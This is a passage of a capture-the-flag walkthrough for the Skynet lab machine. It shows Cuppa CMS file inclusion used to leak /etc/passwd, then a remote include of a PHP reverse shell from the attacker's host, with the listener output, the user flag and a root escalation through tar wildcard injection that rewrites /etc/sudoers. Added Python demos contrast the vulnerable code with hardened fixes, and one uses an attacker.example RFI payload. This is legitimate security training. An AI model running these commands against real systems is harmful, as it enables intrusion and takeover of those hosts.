1.02 Linear Algebra.md N 70314 Tue Sep 17 11:01:29 2019
important.txt N 117 Tue Sep 17 11:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 11:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 11:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 11:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 11:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 11:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 11:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 11:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 11:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 11:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 11:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 11:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 11:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 11:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 11:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 11:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 11:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 11:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 11:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 11:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 11:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 11:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 11:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 11:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 11:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 11:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 11:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 11:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 11:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 11:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 11:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 11:01:29 2019
9204224 blocks of size 1024. 5830948 blocks available
Inside notes there is a relevant file, important.txt, with this content:
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
A new URL path is revealed: /45kra24zxs28v3yd
I enumerated the new path with DirBuster and the medium wordlist; it found an administration page:
Cuppa CMS:
http://10.10.😄/45kra24zxs28v3yd/administrator
Cuppa CMS is vulnerable to Remote File Inclusion (RFI) and Local File Inclusion (LFI) through the urlConfig parameter of alertConfigField.php:
https://www.exploit-db.com/exploits/25971
3 - Exploit
SquirrelMail 1.4.23 is vulnerable to CVE-2017-7692, but the RCE is post-authentication. I had the credentials now, but I was out of luck:
https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
I tried to exploit SquirrelMail but it did not work. The advisory notes the bug is only exploitable when SquirrelMail delivers mail through the local sendmail binary; with SMTP delivery the injected arguments never reach a command line, which would explain the failure here. So I moved on to the CMS exploit.
Finally I had success with the RFI/LFI from this exploit:
https://www.exploit-db.com/exploits/25971
The vulnerable file is alertConfigField.php, which includes whatever the unsanitised GET parameter urlConfig points at:
http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php
I tested the LFI by leaking the sensitive system file /etc/passwd:
http://10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
Field configuration:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
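The include bug in code form, as an added example (Python, not Cuppa's own PHP): a loader that joins the user-supplied urlConfig onto the webroot the way include($_GET['urlConfig']) does, beside a hardened version that refuses URL schemes and checks that the resolved path stays under the webroot. The directory tree, the file contents and the attacker URL are constructed for the demo.

```python
"""Vulnerable vs. hardened version of the include behind alertConfigField.php.

Added example in Python, not Cuppa's PHP. load_field_vulnerable() joins the
user-supplied urlConfig onto the webroot with no checks, the way
include($_GET['urlConfig']) does; load_field_hardened() refuses URL schemes and
requires the resolved path to stay inside the webroot. The directory tree,
file contents and attacker URL below are constructed for the demo.
"""
import os
import shutil
import tempfile
import urllib.parse


def load_field_vulnerable(base_dir, url_config):
    """No validation: '../' walks out of base_dir, and an absolute path makes
    os.path.join discard base_dir entirely. (PHP with allow_url_include=On
    would additionally fetch an http:// value; Python just fails to open it.)"""
    with open(os.path.join(base_dir, url_config)) as f:
        return f.read()


def load_field_hardened(base_dir, url_config):
    """Reject remote includes, then resolve symlinks and '..' before checking
    containment: the check must run on the final path, not on the raw string."""
    if urllib.parse.urlparse(url_config).scheme:
        raise ValueError("remote includes are not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, url_config))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes the webroot: {url_config!r}")
    with open(target) as f:
        return f.read()


def build_demo_tree():
    """Constructed layout: <root>/html is the webroot, <root>/etc/passwd the
    secret outside it. Returns the webroot path."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    html = os.path.join(root, "html")
    os.makedirs(os.path.join(html, "fields"))
    with open(os.path.join(html, "fields", "default.txt"), "w") as f:
        f.write("legit field config\n")
    os.makedirs(os.path.join(root, "etc"))
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return html


PAYLOADS = (
    "fields/default.txt",                 # legitimate use
    "../etc/passwd",                      # the writeup's traversal, scaled to the demo tree
    "http://attacker.example/shell.php",  # constructed RFI attempt
)


def demo():
    """Feed each payload to both loaders; returns {(loader, payload): outcome}."""
    html = build_demo_tree()
    results = {}
    try:
        for name, loader in (("vulnerable", load_field_vulnerable),
                             ("hardened", load_field_hardened)):
            for payload in PAYLOADS:
                try:
                    results[(name, payload)] = loader(html, payload).strip()
                except (ValueError, OSError) as exc:
                    results[(name, payload)] = f"blocked: {type(exc).__name__}"
    finally:
        shutil.rmtree(os.path.dirname(html), ignore_errors=True)
    return results


if __name__ == "__main__":
    for key, outcome in demo().items():
        print(key, "->", outcome)
```

The order of the two checks in the hardened loader matters: the scheme test has to come first because realpath() would happily turn "http://host/x" into a harmless-looking path under the webroot, and the containment test has to run on the realpath() result, since a raw-string blacklist of "../" is bypassed by encodings, symlinks and absolute paths.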
The next idea was to include a remote file from my machine containing a reverse shell. Since the target runs PHP, I downloaded the pentestmonkey PHP reverse shell and set $ip and $port in it to my VPN address and 8889:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
I served it with Python's HTTP server and set up a netcat listener:
python3 -m http.server 7777
nc -lvp 8889
Finally, triggering the include (an http:// include only works because allow_url_include is enabled on the target):
10.10.😄/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.9.😄:7777/shell2.php
listening on [any] 8889 ...
10.10.😄: inverse host lookup failed: Unknown host
connect to [10.9.😄] from (UNKNOWN) [10.10.😄] 54896
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
16:20:17 up 1:52, 0 users, load average: 0.00, 0.06, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
User flag:
$ cat user.txt
7ce5c2109a40f958099283600a9ae807
In /home/milesdyson there is also a backups directory owned by root, containing a script and a freshly written archive:
$ ls -lrta
total 4584
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
drwxr-xr-x 5 milesdyson milesdyson 4096 Sep 17 2019 ..
drwxr-xr-x 2 root root 4096 Sep 17 2019 .
-rw-r--r-- 1 root root 4679680 Jun 17 16:23 backup.tgz
4 - Post-Exploitation and privilege escalation
Now I have a low privileged user. I started enumerating basic things, one of those was the crontab:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Great: root runs /home/milesdyson/backups/backup.sh every minute.
The shell script contains:
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
This is exploitable: www-data can write to /var/www/html, and root runs tar cf ... * there, so every file name in that directory is expanded by the shell into tar's argument list. GNU tar accepts options anywhere among its operands, so a file named --checkpoint-action=exec=... becomes an option that makes tar run a command, as root, on the next backup.
The approach is to make www-data a sudoer without a password. Following the classic wildcard exploit, in /var/www/html I created the payload script and the two option-named files (note that > replaces /etc/sudoers wholesale; outside a throwaway lab, append with >> or drop a file into /etc/sudoers.d instead):
$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
$ echo "" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "" > --checkpoint=1
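The step above reproduced locally, as an added example that is not part of the writeup: it stages a throwaway copy of the webroot with the same three planted files, runs the exact tar line from backup.sh through /bin/sh so the wildcard expands, and checks whether the payload ran; then it runs the fixed form with -- and checks that it did not. It needs GNU tar; the directories, the marker file and the payload body (a marker write instead of the sudoers edit) are constructed for the demo.

```python
"""Local reproduction of the tar wildcard injection behind backup.sh, plus the
fix. Added example, not from the writeup. Requires GNU tar (--checkpoint and
--checkpoint-action are GNU extensions; busybox/bsdtar reject them). Everything
here is staged in temporary directories: the fake webroot, the payload script
(which drops a marker file instead of rewriting /etc/sudoers) and the archive.
"""
import os
import shutil
import subprocess
import tempfile
import time

# What backup.sh runs as root from cron, and the hardened form. With '--' (or
# './*') the planted file names can no longer be parsed as options.
VULNERABLE_CMD = "tar cf {out} *"
FIXED_CMD = "tar cf {out} -- *"


def have_gnu_tar():
    """True if the tar on PATH is GNU tar (the only one honouring --checkpoint)."""
    try:
        out = subprocess.run(["tar", "--version"], capture_output=True, text=True)
    except OSError:
        return False
    return out.returncode == 0 and "GNU tar" in out.stdout


def stage_webroot(marker):
    """Fake /var/www/html: ordinary content plus the three planted files."""
    root = tempfile.mkdtemp(prefix="skynet-html-")
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<html>skynet</html>\n")
    with open(os.path.join(root, "privesc.sh"), "w") as f:
        f.write(f"echo pwned > '{marker}'\n")   # stands in for the sudoers write
    # File names that the shell's '*' turns into arguments, and GNU tar then
    # accepts as options (it permutes options and operands freely).
    open(os.path.join(root, "--checkpoint=1"), "w").close()
    open(os.path.join(root, "--checkpoint-action=exec=sh privesc.sh"), "w").close()
    return root


def run_backup(tar_cmd):
    """Run a backup.sh-style command in a freshly staged webroot.
    Returns True if privesc.sh executed (the marker file appeared)."""
    outdir = tempfile.mkdtemp(prefix="skynet-backups-")
    marker = os.path.join(outdir, "pwned")
    root = stage_webroot(marker)
    try:
        cmd = tar_cmd.format(out=os.path.join(outdir, "backup.tgz"))
        # shell=True so '*' is expanded by /bin/sh, exactly as in backup.sh
        subprocess.run(cmd, shell=True, cwd=root, capture_output=True)
        for _ in range(20):   # allow for tar returning before the action's child finishes
            if os.path.exists(marker):
                return True
            time.sleep(0.1)
        return False
    finally:
        shutil.rmtree(root, ignore_errors=True)
        shutil.rmtree(outdir, ignore_errors=True)


if __name__ == "__main__":
    if not have_gnu_tar():
        raise SystemExit("GNU tar required")
    print("vulnerable command ran payload:", run_backup(VULNERABLE_CMD))
    print("fixed command ran payload:     ", run_backup(FIXED_CMD))
```

The fix is a one-character change to backup.sh (tar cf ... -- * or tar cf ... ./*), but the underlying rule is broader: any root cron job that globs inside a directory writable by a lower-privileged user hands that user control over the command line, and tar is just the tool with the most convenient option for turning that into code execution.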
Then I waited for the next cron run, using date to see how far away the minute boundary was:
$ date
Thu Jun 17 16:28:55 CDT 2021
$ date
Thu Jun 17 16:28:57 CDT 2021
$ date
Thu Jun 17 16:28:58 CDT 2021
$ date
Thu Jun 17 16:28:59 CDT 2021
$ date
Thu Jun 17 16:29:00 CDT 2021
$ date
sudo did not work from the raw reverse shell until I upgraded it to a proper tty with python:
$ python -c 'import pty; pty.spawn("/bin/bash")'
After that sudo works without restrictions:
$ sudo bash
Rooted:
root@skynet:/var/www/html# id && whoami && uname -a
uid=0(root) gid=0(root) groups=0(root)
root
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
Thanks for reading!